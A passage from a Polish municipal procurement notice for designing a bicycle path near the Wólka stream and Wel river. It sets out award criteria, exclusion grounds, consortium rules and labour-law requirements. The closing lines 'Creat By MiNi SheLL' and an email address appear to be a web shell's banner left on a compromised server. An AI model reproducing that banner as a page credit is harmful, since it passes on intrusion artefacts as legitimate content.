budowę w Starostwie Powiatowym w Nowym Mieście Lubawskim.<br/>2)	Rozpoznanie i ocena warunków gruntowo – wodnych poprzez wykonanie badań geologicznych, zgodnie z normami przewidzianymi dla tego typu inwestycji.<br/>3)	Sporządzenie dokumentów i opinii do uzyskania decyzji o środowiskowych uwarunkowaniach przedsięwzięcia, jeżeli będzie wymagana.<br/>4)	Sporządzenie operatów wodnoprawnych do uzyskania decyzji pozwolenia wodnoprawnego na lokalizację obiektów mostowych i przepustów na podstawowych ciekach wodnych jak struga Wólka oraz rzeka Wel.<br/>5)	Projekt budowlany – 5 egzemplarzy<br/>6)	Projekt wykonawczy – 3 egzemplarze<br/>7)	Specyfikacja techniczna wykonania i odbioru robót budowlanych – 2 egzemplarze<br/>8)	Kosztorys inwestorski - 2 egzemplarze<br/>9)	Przedmiar robót do SWZ – 2 egzemplarze<br/>10)	Zatwierdzony projekt stałej organizacji ruchu – 2 egzemplarze<br/>15. Dokumentacje wymieniona w ust.14 pkt.5-10 należy złożyć również w formie elektronicznej na nośniku elektronicznym w formacie PDF dostępnym cyfrowo.<br/>16. Cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z opisu przedmiotu zamówienia, bez których nie można wykonać zamówienia. Wykonawca musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Komisja przetargowa oceni oferty sumując punkty uzyskane z poszczególnych kryteriów.<br/>2) Jeżeli Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę, która otrzymała<br/>najwyższą ocenę w kryterium o najwyższej wadze.<br/>3) Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną lub<br/>najniższym kosztem. 4) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ppkt. 3, Zamawiający wezwie<br/>Wykonawców, którzy złożyli te<br/>oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę lub koszt.<br/>5) Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>6) Komisja przetargowa zaproponuje wybór oferty, która uzyskała najwięcej punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone na podstawie art. 112 ustawy z 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z póź.zm.), oraz nie mogą podlegać wykluczeniu z postępowania z powodu okoliczności określonych w art. 108 ust.1 oraz art. 109 ust. 1 pkt 1, 4, 5, 7 i 8 ustawy z 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z póź.zm.) oraz nie mogą podlegać wykluczeniu z postępowania na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r poz.835) zwaną dalej „UOBN”. <br/>1.1.Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, w stosunku, do którego zachodzi którakolwiek z okoliczności, o której mowa w:<br/>a) art. 108 ust.1 Pzp;<br/>b) art. 109 ust. 1 pkt. 1,4,5,7, 8 Pzp;<br/>c) art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U. 2022 poz. 835), zwana dalej „UOBN”.<br/>1.2.Zgodnie z art. art. 7 ust. 1 UOBN z postępowania o udzielenie zamówienia zamawiający wyklucza Wykonawcę:<br/>1) wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN;<br/>2) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 poz.1124 ze zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN;<br/>3) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 ze zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN.<br/>1.3. Wykluczenie, o którym mowa w ust. 2 następować będzie na okres trwania w/w okoliczności. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie art. 7 ust. 1 UOBN, Zamawiający odrzuca ofertę takiego Wykonawcy.<br/>1.4. Zamawiający będzie weryfikował przesłankę wykluczenia, o której mowa w ust. 9 na podstawie:<br/>1) Wykazów określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014<br/>2) Listy Ministra właściwego do spraw wewnętrznych obejmującej osoby i podmioty, wobec których są stosowane środki, o których mowa w art. 1 UOBN.<br/>2.	Wykonawcy ubiegający się o udzielenie zamówienia muszą: <br/>a)	posiadać zdolność do występowania w obrocie gospodarczym, tj.: <br/>-	być zarejestrowanymi we właściwym rejestrze lub w centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do takiego rejestru lub takiej ewidencji; <br/>b)	posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, tj.: <br/>-	Zamawiający nie stawia w tym zakresie warunku udziału w postępowaniu; <br/>c)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: <br/>- wykaz dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.; <br/>d)	posiadać zdolność techniczną lub zawodową, tj.: <br/>- wykaz sług wykonanych nie wcześniej niż w okresie ostatnich 3 lat (ilość zamówień należy rozumieć jako liczbę zawartych umów), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>3.	Ocena spełnienia warunków określonych w ppkt. 2 zostanie przez Zamawiającego dokonana poprzez analizę dokumentów, określonych w pkt. X SWZ, złożonych przez Wykonawców na wezwanie Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)formularz oferty; <br/>2)pełnomocnictwo (jeżeli dotyczy); <br/>3)oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania oraz o spełnianiu warunków udziału w postępowaniu; <br/>4)zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy); <br/>5)oświadczenie o braku przynależności do grupy kapitałowej; <br/>6)odpis lub informację z KRS lub z CEIoDG; <br/>7)zaświadczenie właściwego naczelnika US; <br/>8)zaświadczenie ZUS lub KRUS; <br/>9)dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 30 000,00 zł,<br/>10) wykaz (co najmniej dwóch) usług polegających na wykonaniu projektów polegających na budowie / rozbudowie / przebudowie ścieżek rowerowych lub pieszo – rowerowych wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości nie mniejszej niż 150 000,00zł brutto każda, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie zgodnie z załącznikiem do SWZ – w celu potwierdzenia spełnienia wymagania z pkt. IX SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)formularz oferty; <br/>2)pełnomocnictwo (jeżeli dotyczy); <br/>3)oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania oraz o spełnianiu warunków udziału w postępowaniu; <br/>4)zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy); <br/>5)oświadczenie o braku przynależności do grupy kapitałowej; <br/>6)odpis lub informację z KRS lub z CEIoDG; <br/>7)zaświadczenie właściwego naczelnika US; <br/>8)zaświadczenie ZUS lub KRUS; <br/>9)dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 30 000,00 zł,<br/>10) wykaz (co najmniej dwóch) usług polegających na wykonaniu projektów polegających na budowie / rozbudowie / przebudowie ścieżek rowerowych lub pieszo – rowerowych wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości nie mniejszej niż 150 000,00zł brutto każda, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie zgodnie z załącznikiem do SWZ – w celu potwierdzenia spełnienia wymagania z pkt. IX SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2.	W przypadku oferty wspólnej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wykonawcy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. <br/>3.	Zgodnie z obowiązującym prawem (w szczególności: art. 860 §1 k.c.) Zamawiający traktuje spółkę cywilną jako stosunek zobowiązaniowy jej wspólników, a nie odrębny podmiot wyposażony w osobowość prawną, w związku z czym oferta składana przez wspólników spółki cywilnej musi być sporządzona zgodnie z SWZ oraz zawierać dokumenty (jeżeli są wymagane na podstawie pkt. X SWZ), odpowiednio: <br/>a)	oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (z art. 125 ustawy) – złożone przez każdego ze wspólników, <br/>b)	oświadczenie o dot. przynależności do grupy kapitałowej (w zakresie art. 108 ust. 1 pkt 5 ustawy) – złożone przez każdego ze wspólników, <br/>c)	zaświadczenie o niezaleganiu w opłacaniu podatków – złożone przez każdego ze wspólników oraz przez spółkę cywilną, <br/>d)	zaświadczenie o niezaleganiu w opłacaniu składek – złożone przez każdego ze wspólników oraz przez spółkę cywilną, <br/>e)	odpis z ewidencji działalności gospodarczej (CEIDG) – złożony przez każdego ze wspólników. <br/>4.	Oferta wspólna składana przez Wykonawców innych niż spółka cywilna musi być sporządzona zgodnie z SWZ oraz zawierać: <br/>a)	oświadczenia (w szczególności z art. 125 i dot. sytuacji z art. 108 ust. 1 pkt 5 ustawy) oraz dokumenty, dotyczące każdego Wykonawcy, w szczególności: odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, zaświadczenie właściwego naczelnika urzędu skarbowego, zaświadczenie z właściwego oddziału ZUS,– składane przez każdego z Wykonawców osobno, <br/>b)	wypełniony formularz oferty, oświadczenie, z którego wynika, które elementy zamówienia wykonają poszczególni członkowie konsorcjum oraz oświadczenia i dokumenty dotyczące spełnienia postawionych przez Zamawiającego warunków – nie wymienione w lit. a – składane przez pełnomocnika Wykonawców w ich imieniu, <br/>c)	pełnomocnictwo, o którym mowa w ppkt. 2. <br/>5.	Oferta wraz z załącznikami musi być podpisana przez pełnomocnika Wykonawców. <br/>6.	Pełnomocnik Wykonawców pozostaje w kontakcie z Zamawiającym w toku postępowania, zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje oświadczenia, informacje, korespondencję, itp. <br/>7.	Umowa pomiędzy Wykonawcami ustanawiająca konsorcjum powinna zawierać co najmniej: <br/>a)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot zamówienia, <br/>b)	wskazanie pełnomocnika do reprezentowania partnerów oraz zakresu jego pełnomocnictwa (czy obejmuje ono także podpisanie umowy), <br/>c)	czas obowiązywania umowy, który nie może być krótszy, niż termin obejmujący realizację zamówienia. <br/>8.	Wykonawca, którego ofertę wybrano, zobowiązany jest przedstawić Zamawiającemu – przed zawarciem umowy o udzielenie zamówienia – umowę, o której mowa w ppkt. 7. <br/>9.	Zamawiający uzna za spełnione przez Wykonawców składających ofertę wspólną warunki udziału w postępowaniu na następujących zasadach: <br/>a)	wykonane zamówienia równoważne – Wykonawcy winni spełnić warunek łącznie, <br/>b)	dysponowanie osobą z uprawnieniami – Wykonawcy winni spełnić warunek łącznie, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany niniejszej umowy mogą nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu pod rygorem nieważności.<br/>2. Oprócz przypadków określonych w ustawie prawo zamówień publicznych możliwość zmiany umowy w zakresie terminu jej wykonania istnieje w razie zaistnienia jednej z poniższych okoliczności:<br/>1) zmiany przepisów prawnych, mających wpływ na termin wykonania Umowy,<br/>2) przedłużających się procedur postępowań administracyjnych i innych postępowań przed organami administracji publicznej, powyżej terminów ustawowych.<br/>3) wydania decyzji, postanowień lub innych aktów administracyjnych mających wpływ na wykonanie Przedmiotu Umowy, w tym wstrzymania robót,<br/>4) przestojów lub opóźnień spowodowanych przez Zamawiającego, o ile okoliczności te powodują<br/>konieczność zmiany terminu wykonania przedmiotu umowy,<br/>3. W okolicznościach określonych powyżej, Zamawiający przewiduje, iż zmianie mogą ulec postanowienia Umowy dotyczące terminu wykonania Umowy o czas trwania przeszkód, nie zawinionych przez Wykonawcę, a mających wpływ na niemożność realizacji przedmiotu umowy,<br/>4. Zamawiający wskazuje, iż Umowa może ulec zmianie tylko w zakresie, w jakim warunki (okoliczności) określone w ust. 2 będą pozostawały w adekwatnym związku przyczynowo-skutkowym z terminem wykonania Umowy.<br/>5. Przez zmianę przepisów prawnych strony rozumieją następującą po podpisaniu Umowy zmianę aktów prawa powszechnie obowiązującego lub obowiązujących strony aktów prawa miejscowego, których treść dotyczy przedmiotu Umowy.<br/>6. Wykonawca, który uważa się za uprawnionego do wystąpienia z żądaniem zmiany Umowy w związku z wystąpieniem okoliczności, o których mowa w ust. 2 niniejszego paragrafu, zobowiązany jest złożyć pisemny wniosek o zmianę terminu wykonania Umowy, sposobu jej wykonania lub wysokości wynagrodzenia. Ww. wniosek Wykonawcy, winien zawierać przywołanie podstawy prawnej żądania Wykonawcy wraz z powołaniem się na właściwe postanowienia Umowy i zawierać uzasadnienie wniosku w oparciu o jej zapisy. We wniosku Wykonawca powinien precyzyjnie określić w jakim zakresie domaga się zmiany w Umowie, przedstawiając stosowne kalkulacje i obliczenia, jeśli ich przygotowanie jest niezbędne do należytej oceny wniosku Wykonawcy przez Zamawiającego.<br/>7. Niezależnie od postanowień powyższych, strony przewidują, iż umowa może ulec zmianie w zakresie wynagrodzenia Wykonawcy w przypadku zmiany:<br/>1) stawki podatku od towarów i usług,<br/>2) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne o ile zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>8. W przypadku zmiany stawki podatku VAT przyjętej przez Wykonawcę w ofercie w toku realizacji umowy, wynagrodzenie Wykonawcy netto pozostaje bez zmian, a strony w drodze pisemnego aneksu pod rygorem nieważności do umowy wprowadzą do umowy zmienioną stawkę podatku VAT i nową wartość brutto umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta, oświadczenie oraz przedmiotowe środki dowodowe (jeżeli były wymagane) mogą zostać złożone w przedmiotowym postępowaniu wyłącznie drogą elektroniczną za pośrednictwem Profilu Nabywcy Zamawiającego (platformazakupowa.pl) pod adresem: Profil Nabywcy – Gmina Grodziczno (platformazakupowa.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-06 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca oraz Podwykonawcy (dalsi Podwykonawcy) zobowiązani są do zatrudnienia na podstawie stosunku pracy osoby, które będą wykonywać czynności bezpośrednio związane z wykonywaniem usług objętych przedmiotem umowy, które wykonywać będą bezpośrednio czynności związane z wykonywaniem usług, czyli pracowników wykonujących czynności polegający na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks Pracy. Wymóg ten nie dotyczy m.in. osób sprawujących samodzielne funkcje techniczne w budownictwie;<br/>2.	Wykonawca zobowiązany jest do przedłożenia Zamawiającemu, na jego wniosek w terminie określonym we wniosku, dokumentów potwierdzających zatrudnienie osób wykonujących czynności, o których mowa powyżej, dokumentów w szczególności pisemnego oświadczenia wykonawcy lub podwykonawcy potwierdzającego, że pracownicy wykonawcy lub podwykonawcy są zatrudnieni na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks Pracy z uwzględnieniem minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę. Oświadczenie to powinno zawierać w szczególności: imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika;<br/>3.	W trakcie wykonywania przedmiotu umowy na każde wezwanie Zamawiającego, w wyznaczonym w tym wezwaniu terminie, nie krótszym niż 5 dni, Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody (do wyboru) w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane czynności w trakcie realizacji przedmiotu umowy:<br/>1)	oświadczenie zatrudnionego pracownika;<br/>2)	oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę;<br/>3)	poświadczoną za zgodność z oryginałem kopię umowy o pracę zatrudnionego pracownika;<br/>4)	inne dokumenty.<br/>4.	Dokumenty powyższe powinny zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy.<br/>5.	Niezłożenie przez Wykonawcę dokumentów, o których mowa w ust. 3, w terminie wskazanym przez Zamawiającego, będzie traktowane jako niewypełnienie obowiązku zatrudnienia osób wykonujących przedmiot umowy na podstawie stosunku pracy w rozumieniu ustawy z dnia 26 czerwca 1974r. – Kodeks pracy. <br/>6.	Zamawiającemu w zakresie kontroli spełnienia przez Wykonawcę wymagań, o których mowa w ust. 1 i ust. 3, przysługuje prawo przeprowadzenia kontroli w miejscu wykonywania przedmiotu umowy. Kontrola może być przeprowadzona bez wcześniejszego uprzedzenia Wykonawcy. <br/>7.	W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.<br/>8.	Za niedopełnienie wymogu określonego w ust. 1, zatrudnienia na podstawie umowy o pracę osób wykonujących czynności określonych powyżej Wykonawca zapłaci Zamawiającemu karę umowną – w wysokości kwoty minimalnego wynagrodzenia za pracę, ustalonego na podstawie przepisów o minimalnym wynagrodzeniu brutto za pracę (obowiązujących w chwili stwierdzenia przez Zamawiającego naruszenia), za każdą osobę w stosunku do której stwierdzono niedopełnienie obowiązku, wskazanego w ust. 1 zatrudnienia na podstawie umowy o pracę.

Creat By MiNi SheLL
Email: jattceo@gmail.com